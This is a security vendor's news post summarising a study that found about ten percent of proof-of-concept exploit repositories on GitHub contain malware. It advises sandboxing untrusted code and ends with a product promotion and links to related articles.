Thousands of PoC Exploits on GitHub are Laced with Malware, Study Shows
Thousands of proof-of-concept (PoC) vulnerability exploits on GitHub are ridden with malware, according to a recent study by researchers at the Leiden Institute of Advanced Computer Science.
GitHub is popular among security experts who want to share their findings with the community. PoC repositories help cybersecurity researchers validate potential fixes for new vulnerabilities and perform security assessments in stable, controlled environments against known exploits.
While PoC exploits are also shared on dedicated websites, forums and communication platforms,code-hosting platforms like GitHub are often preferred in this situation. On the downside, GitHub’s public code repositories don’t guarantee the legitimacy of the PoC, its provenience, or its efficacy.
“Professional frameworks like Metasploit or reputable databases like Exploit-DB contain exploits for many CVEs, but not for all of them,” reads the researchers’ technical paper. “Pentesters then turn to Proof of Concept (PoC) exploits published in public code repositories like GitHub to see if they can find something they can use to exploit the issue and demonstrate the vulnerability.”
The study, led by Soufian El Yadmani, Robin The and Olga Gadyatskaya, highlights that 4,893 out of 47,313 (10.3%) analyzed repositories were laced with malware. Researchers analyzed traits like the presence of Trojanized binaries, obfuscated rogue code, and malicious IP address callbacks to determine if a repository intends to cause harm.
The research further revealed that the spiked PoC repositories had different scopes. Some hid malware and other harmful scripts, some tried to harvest data from users, while others pranked users to remind them of the perils of running a PoC without analyzing the code beforehand.
To avoid exposing themselves to malware-ridden PoC exploits, users should inspect the code thoroughly and run it in a controlled environment (sandbox, virtual machine) if obfuscated.
Dedicated software like Bitdefender Ultimate Security can protect you against malicious PoC exploits and other cyberthreats thanks to its comprehensive library of features, which includes:
- Continuous, real-time protection against viruses, worms, Trojans, zero-day exploits, rootkits, spyware, ransomware and other e-threats
- Network threat prevention module that scans, detects and blocks malicious network-level activities
- Behavioral detection technology that closely monitors active apps and takes instant action upon detecting suspicious activity
- Vulnerability assessment module that scans your system for outdated and vulnerable software, outdated security patches and unsafe system settings, and suggests the best fix
How to monitor your online privacy during your Thanksgiving trip
November 22, 2022
Just your yearly dose of Black Friday spam: Cybercrooks get ahead of the game to steal shoppers’ info
November 16, 2022
Bitdefender VPN in 2022: the new, the improved, and the soon-to-be
November 14, 2022
August Spam Debrief: Bitdefender Labs Warns of Fraud Campaigns Exploiting the Russia-Ukraine War
August 31, 2022
Snake Keylogger Returns in Malspam Campaign Disguised as Business Portfolio from IT Vendor
August 30, 2022
What is medical identity theft and how to protect against it
July 27, 2022